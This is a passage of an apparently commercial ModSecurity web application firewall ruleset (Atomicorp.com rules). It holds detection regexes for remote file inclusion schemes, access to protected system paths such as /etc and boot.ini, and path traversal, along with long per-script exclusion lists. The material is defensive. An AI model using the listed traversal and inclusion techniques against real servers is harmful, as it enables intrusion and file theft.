RGS:faqText|!ARGS:request_uri|!ARGS:google|!ARGS:definition|!ARGS:openid.return_to|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:searchstring|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:from_href|!ARGS:Comentario|!ARGS:dynadata[_SIGNATURE]|!ARGS:ppicture|!ARGS:paypal_ipn|!ARGS:defaultImage|!ARGS:title|!ARGS:html|!ARGS:dbody|!ARGS:right_frame|!ARGS:l1_bdy|!ARGS:theMessage|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:commontemplate[header]|!ARGS:uri|!ARGS:/^blockbody/|!ARGS:field11|!ARGS:field_id_7|!ARGS:/^ViewState/|!ARGS:vars[DBhostname]|!ARGS:postvars|!ARGS:base1|!ARGS:cart_header|!ARGS:setting[description]|!ARGS:video_google|!ARGS:layout|!ARGS:GMAP_KEY|!ARGS:full_story|!ARGS:source|!ARGS:set_static_uri_to|!ARGS:livesite|!ARGS:Infos|!ARGS:rev_you_tube|!ARGS:ret_address|!ARGS:GMAP_KEY|!ARGS:newsBody|!ARGS:html_code|!ARGS:/http_script_dir/|!ARGS:cfgfilecontent|!ARGS:user_sig|!ARGS:cur|!ARGS:yahoo|!ARGS:/Website/|!ARGS:sig|!ARGS:template_data|!ARGS:template|!ARGS:option[ping_sites]|!ARGS:KT_Update1|!ARGS:flds[Message]|!ARGS:EditorHTML|!ARGS:theVisibility|!ARGS:friend_M|!ARGS:before|!ARGS:vars[siteName]|!ARGS:replycontents|!ARGS:sitedisclaimer|!ARGS:sm_b_style|!ARGS:success|!ARGS:/^css/|!ARGS:short_story|!ARGS:ecards_more_pic_target|!ARGS:vthumb|!ARGS:introduction|!ARGS:register_at|!ARGS:/^products_description/|!ARGS:terms_content|!ARGS:statusaddress|!ARGS:revnews_ad_120|!ARGS:revnews_video|!ARGS:/sponsor_banner/|!ARGS:videoPath|!ARGS:newText|!ARGS:PageCopy|!ARGS:amp;loc|!ARGS:f_header|!ARGS:option[78]|!ARGS:savecontent|!ARGS:agendWebPage|!ARGS:params[helpsite]|!ARGS:iconnew|!ARGS:wpau-ftphost|!ARGS:gen_header|!ARGS:button_dir|!ARGS:news_desc|!ARGS:x_organizational|!ARGS:href|!ARGS:form_element3|!ARGS:wptextbox1|!ARGS:edit[site_mission]|!ARGS:answer|!ARGS:intro|!ARGS:note|!ARGS:c_msg|!ARGS:how_did_you_hear_about_us|!ARGS:back_to|!ARGS:/^sql_/|!ARGS:problem|!ARGS:default_banner|!ARGS:archive_chrono|!ARGS:thm|!ARGS:_RW_|!ARGS:/^rss/|!ARGS:/rss$/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:team[logo]|!ARGS:helpbox|!ARGS:return|!ARGS:basehref|!ARGS:/^redirect/|!ARGS:redir|!ARGS:ret|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:portal_body|!ARGS:filecontent|!ARGS:inc|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:body|!ARGS:Post|!ARGS:reply|!ARGS:last_msg|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:notes|!ARGS:missing_fields_redirect|!ARGS:templatePath|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:view|!ARGS:howhear|!ARGS:oldmsg|!ARGS:/redirect/|!ARGS:src|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:signature|!ARGS:disc|!ARGS:utmr|!ARGS:site_desc|!ARGS:user[signature]|!ARGS:Query|!ARGS:steps|!ARGS:bbcode_replace|!ARGS:jumpTo|!ARGS:site|!ARGS:memo|!ARGS:live_site|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:g2_return|!ARGS:goto|!ARGS:site_first|!ARGS:from|!ARGS:footer|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:configParams[api][configParamValue]|!ARGS:/^wimpy/|!ARGS:fb_ref|!ARGS:newidentities[0][signature]|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:value_190|!ARGS:pp_bio_content|!ARGS:xajaxargs[]|!ARGS:backto|!ARGS:/^http/|!ARGS:/^rsargs/|!ARGS:op|!ARGS:BLK_block_content|!ARGS:Store_CustomerEmail_Header|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:hamechalets_desc|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:description|!ARGS:ret|!ARGS:newDescription|!ARGS:area|!ARGS:content|!ARGS:/^data\[tt_content\]/|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:newcontent|!ARGS:st_widget|!ARGS:video|!ARGS:ban_reason|!ARGS:def|!ARGS:data[Email][comment]|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:Store_OUI_GlobalFooter|!ARGS:in[http]|!ARGS:dynafield[_SIGNATURE]|!ARGS:payment_extrainfo|!ARGS:virtual_http_path|!ARGS:cta_content|!ARGS:wysiwyg|!ARGS:banner|!ARGS:env_ping_list|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:/^virtual_http/|!ARGS:cta_content|!ARGS:map_description_1|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:field5|!ARGS:p_content|!ARGS:f_site|!ARGS:CANCEL_RETURN "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)\:/"          "phase:2,deny,log,auditlog,status:403,capture,id:340873,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:keywords|!ARGS:short|!ARGS:plaatje|!ARGS:ranking_info|!ARGS:/code/|!ARGS:/callback/|!ARGS:pic|!ARGS:/sponsors/|!ARGS:want2Read|!ARGS:/webcam/|!ARGS:search_string|!ARGS:yt_thumb|!ARGS:subject|!ARGS:direct|!ARGS:user_mail_register_no_approval_required_body|!ARGS:fflv|!ARGS:direct|!ARGS:/site/|!ARGS:source_location/|!ARGS:/^fetch/|!ARGS:/web/|!ARGS:/openid_identifier|!ARGS:/adres/|!ARGS:/logo/|!ARGS:/webseite/|!ARGS:resolution|!ARGS:/link/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:/message/|!ARGS:/^utm/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:/youtube/|!ARGS:camefrom|!ARGS:ucapi|!ARGS:pic1|!ARGS:clickTag1|!ARGS:rf|!ARGS:web|!ARGS:/home/|!ARGS:sourcetitle|!ARGS:form_pathscript|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:dcsref|!ARGS:lec_rm|!ARGS:n-state|!ARGS:/img/|!ARGS:Stream|!ARGS:CP_email|!ARGS:flvsite|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:/^clickTagFrame/|!ARGS:attribute29|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:request|!ARGS:confirm|!ARGS:/^groups/|!ARGS:came_from|!ARGS:prodLogo|!ARGS:prodDownload|!ARGS:itemIntro|!ARGS:photo|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:typePageCode|!ARGS:/^GARS_existing/|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:loc|!ARGS:notification_body|!ARGS:sitead|!ARGS:/^product_long/|!ARGS:/server/|!ARGS:/^topic_content/|!ARGS:banner_top|!ARGS:banners_list|!ARGS:heading|!ARGS:packageComments|!ARGS:cl_post|!ARGS:address|!ARGS:board_msg|!ARGS:logo_path|!ARGS:prehtml_root|!ARGS:revpro_video|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:msg|!ARGS:configuration_key|!ARGS:search|!ARGS:/comment/|!ARGS:enquiry|!ARGS:/html_content/|!ARGS:desc|!ARGS:body_html|!ARGS:/^field_id_/|!ARGS:wpUploadDescription|!ARGS:/footer/|!ARGS:FAQTitle|!ARGS:host|!ARGS:webpath|!ARGS:/text/|!ARGS:whereto|!ARGS:/description/|!ARGS:item[content]|!ARGS:pathToPiwik|!ARGS:email_sig|!ARGS:minicms_content|!ARGS:feed|!ARGS:/^artsee_banner_/|!ARGS:fetch|!ARGS:pingback_service|!ARGS:hostname|!ARGS:htmlSource|!ARGS:/virtual_http_path/|!ARGS:/virtual_https_path/|!ARGS:f_content|!ARGS:email_forward|!ARGS:blog|!ARGS:RTServerName|!ARGS:mesg|!ARGS:forward|!ARGS:atc_content|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/^commontemplate/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:advBannerMessage|!ARGS:thumb|!ARGS:question_content|!ARGS:u|!ARGS:header|!ARGS:action|!ARGS:cptpl_dir|!ARGS:newDesc|!ARGS:forum_desc|!ARGS:file_contents|!ARGS:return_to|!ARGS:Stream|!ARGS:contents|!ARGS:arg6|!ARGS:dbhost|!ARGS:copyright|!ARGS:newwebpath|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:stretch|!ARGS:cat_sponsor|!ARGS:/^fields_prev/|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:newsettings[files_dir]|!ARGS:contactMessage|!ARGS:var_value[usps_labels_help_2]|!ARGS:short_story|!ARGS:intro_content|!ARGS:vinculo|!ARGS:openid_return_to|!ARGS:cts|!ARGS:response|!ARGS:hd_request|!ARGS:relocate|!ARGS:add_fd3|!ARGS:headers-28|!ARGS:fulldescr|!ARGS:soundname|!ARGS:Direccionsitioweb|!ARGS:/link/|!ARGS:faqText|!ARGS:request_uri|!ARGS:google|!ARGS:ud_web|!ARGS:openid.return_to|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:searchstring|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:from_href|!ARGS:Comentario|!ARGS:/^dynadata/|!ARGS:ppicture|!ARGS:paypal_ipn|!ARGS:defaultImage|!ARGS:title|!ARGS:html|!ARGS:dbody|!ARGS:right_frame|!ARGS:l1_bdy|!ARGS:theMessage|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:uri|!ARGS:commontemplate[header]|!ARGS:/^blockbody/|!ARGS:field11|!ARGS:field_id_7|!ARGS:/^ViewState/|!ARGS:postvars|!ARGS:vars[DBhostname]|!ARGS:base1|!ARGS:cart_header|!ARGS:setting[description]|!ARGS:webcam|!ARGS:video_google|!ARGS:layout|!ARGS:GMAP_KEY|!ARGS:full_story|!ARGS:source|!ARGS:set_static_uri_to|!ARGS:livesite|!ARGS:Infos|!ARGS:rev_you_tube|!ARGS:ret_address|!ARGS:GMAP_KEY|!ARGS:newsBody|!ARGS:/webaddress/|!ARGS:/http_script_dir/|!ARGS:cfgfilecontent|!ARGS:user_sig|!ARGS:cur|!ARGS:yahoo|!ARGS:/Website/|!ARGS:sig|!ARGS:template_data|!ARGS:template|!ARGS:option[ping_sites]|!ARGS:KT_Update1|!ARGS:flds[Message]|!ARGS:EditorHTML|!ARGS:theVisibility|!ARGS:friend_M|!ARGS:before|!ARGS:vars[siteName]|!ARGS:replycontents|!ARGS:sitedisclaimer|!ARGS:sm_b_style|!ARGS:success|!ARGS:short_story|!ARGS:/^css/|!ARGS:ecards_more_pic_target|!ARGS:vthumb|!ARGS:introduction|!ARGS:register_at|!ARGS:/^products_description/|!ARGS:terms_content|!ARGS:statusaddress|!ARGS:revnews_ad_120|!ARGS:revnews_video|!ARGS:/sponsor_banner/|!ARGS:videoPath|!ARGS:web_site|!ARGS:newText|!ARGS:PageCopy|!ARGS:amp;loc|!ARGS:f_header|!ARGS:option[78]|!ARGS:savecontent|!ARGS:params[helpsite]|!ARGS:iconnew|!ARGS:agendWebPage|!ARGS:wpau-ftphost|!ARGS:gen_header|!ARGS:button_dir|!ARGS:news_desc|!ARGS:x_organizational|!ARGS:href|!ARGS:form_element3|!ARGS:wptextbox1|!ARGS:edit[site_mission]|!ARGS:answer|!ARGS:intro|!ARGS:c_msg|!ARGS:note|!ARGS:domain|!ARGS:how_did_you_hear_about_us|!ARGS:back_to|!ARGS:/^sql_/|!ARGS:clickTAG|!ARGS:problem|!ARGS:default_banner|!ARGS:archive_chrono|!ARGS:thm|!ARGS:_RW_|!ARGS:/^rss/|!ARGS:/rss$/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:team[logo]|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:basehref|!ARGS:/redirect/|!ARGS:redir|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:portal_body|!ARGS:filecontent|!ARGS:inc|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:body|!ARGS:Post|!ARGS:data[Label][website]|!ARGS:reply|!ARGS:last_msg|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:view|!ARGS:howhear|!ARGS:webeditor1|!ARGS:oldmsg|!ARGS:src|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:signature|!ARGS:disc|!ARGS:utmr|!ARGS:site_desc|!ARGS:user[signature]|!ARGS:Query|!ARGS:steps|!ARGS:jumpTo|!ARGS:site|!ARGS:memo|!ARGS:live_site|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:user_website|!ARGS:g2_return|!ARGS:goto|!ARGS:site_first|!ARGS:from|!ARGS:footer|!ARGS:cmstr|!ARGS:remotefile|!ARGS:userDetails[web_address]|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:configParams[api][configParamValue]|!ARGS:/^wimpy/|!ARGS:web_address|!ARGS:msgpreview|!ARGS:fb_ref|!ARGS:notes|!ARGS:pn_domain|!ARGS:newidentities[0][signature]|!ARGS:addendum|!ARGS:utmp|!ARGS:value_190|!ARGS:pp_bio_content|!ARGS:xajaxargs[]|!ARGS:backto|!ARGS:/^http/|!ARGS:/^rsargs/|!ARGS:op|!ARGS:BLK_block_content|!ARGS:ret|!ARGS:Store_CustomerEmail_Header|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:hamechalets_desc|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:description|!ARGS:newDescription|!ARGS:area|!ARGS:content|!ARGS:/^data\[tt_content\]/|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:newcontent|!ARGS:st_widget|!ARGS:video|!ARGS:ban_reason|!ARGS:def|!ARGS:data[Email][comment]|!ARGS:playlist|!ARGS:enlace|!ARGS:Store_OUI_GlobalFooter|!ARGS:in[http]|!ARGS:map|!ARGS:dynafield[_SIGNATURE]|!ARGS:payment_extrainfo|!ARGS:virtual_http_path|!ARGS:cta_content|!ARGS:x_website|!ARGS:wysiwyg|!ARGS:banner|!ARGS:env_ping_list|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:/^virtual_http/|!ARGS:cta_content|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:code|!ARGS:field5|!ARGS:p_content|!ARGS:f_site|!ARGS:CANCEL_RETURN "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)\:/"           "phase:2,deny,log,auditlog,status:403,id:340874,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,capture,chain,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91600

SecRule REQUEST_FILENAME "/mailordermanager5\.mvc" "phase:2,id:91601,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/content_pop\.php" "phase:2,id:91602,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/backend/noticias_abm\.php" "phase:2,id:91603,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/pncrtl/options\.php" "phase:2,id:91604,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin\.cgi" "phase:2,id:91605,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340855,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=340131,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/fim_thumb\.php" "phase:2,id:91606,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340161"

SecRule REQUEST_FILENAME "/intaketemp\.php" "phase:2,id:91607,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/sqltoexcel/sql2excel\.php" "phase:2,id:91608,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016"

SecRule REQUEST_FILENAME "/moodle/mod/glossary/edit\.php" "phase:2,id:91609,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/miespacio/adpaepdc\.php" "phase:2,id:91610,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "ext/ics_awstats/mod1/index\.php" "phase:2,id:91611,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340026,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340151"
SecAction "phase:2,id:91612,t:none,pass,nolog,skipAfter:END_RULES_91612"

SecRule ARGS|!ARGS:config "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)\:/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:320463,rev:9,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (modules.php)'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:config "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)\:/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:320462,rev:9,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (modules.php)'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91612

SecRule REQUEST_FILENAME "/wizard/edit/modules/eshop/product/insert" "phase:2,id:91613,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340009"
SecAction "phase:2,id:91614,t:none,pass,nolog,skipAfter:END_RULES_91614"

SecRule REQUEST_HEADERS|!REQUEST_HEADERS:X-PageView|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:REFERER|ARGS|!ARGS:redirect_to|!ARGS:field_id_29|!ARGS:/highlight/|!ARGS:/search/|!ARGS:/msg/|!ARGS:/comment/|!ARGS:/hilit/|!ARGS:/uri/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/description/|!ARGS:product[media_gallery][images]|!ARGS:/subject/|!ARGS:/comment/|!ARGS:/content/|!ARGS:/data/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/post/|!ARGS:LiveURLSegment|!ARGS:keywords|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:/description/|!ARGS:note_title|!ARGS:/^xjxargs/|!ARGS:backPath|!ARGS:webpage[content]|!ARGS:article[content]|!ARGS:filecontent|!ARGS:/message/|!ARGS:/^fck_/|!ARGS:htmlSource|!ARGS:path_to_lzx|!ARGS:content|!ARGS:/body/ "(?:/(?:etc|proc|var/tmp|usr|opt|s?bin|dev|kern|[br]oot|sys|windows|winnt)/|(?:\/|\\\\)+inetpub|localstart\.asp|boot\.ini)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:normalisePath,t:lowercase,capture,id:321463,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Protected Path Access denied in URI/ARGS',logdata:'%{TX.0}'"

SecMarker END_RULES_91614

SecRule REQUEST_FILENAME "/ucp\.php" "phase:2,id:91615,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340007"
SecAction "phase:2,id:91616,t:none,pass,nolog,skipAfter:END_RULES_91616"

SecRule REQUEST_URI|ARGS|!ARGS:redirect|!ARGS:/resolution/|!ARGS:/description/|!ARGS:/comment/|!ARGS:/obrazek/|!ARGS:/txt/|!ARGS:/keywords/|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:css_data|!ARGS:/text/|!ARGS:/message/|!ARGS:/body/|!ARGS:/content/|!ARGS:/html/|!ARGS:filename "(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))(?:%(?:u2024|2e)|\.){2}(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))"  	"phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,capture,id:321464,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied',logdata:'%{TX.0}'"

SecMarker END_RULES_91616

SecRule REQUEST_FILENAME "/response_3d\.php" "phase:2,id:91617,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340151"
SecAction "phase:2,id:91618,t:none,pass,nolog,skipAfter:END_RULES_91618"

SecRule ARGS|!ARGS:config|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/domain/|!ARGS:ResponsePath "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)\:/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:320468,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (modules.php)'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:config|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/domain/|!ARGS:ResponsePath "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)\:/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:320469,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (modules.php)'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91618

SecRule REQUEST_FILENAME "/getclientpolicies\.aspx" "phase:2,id:91619,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
SecAction "phase:2,id:91620,t:none,pass,nolog,skipAfter:END_RULES_91620"

SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:xml|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS: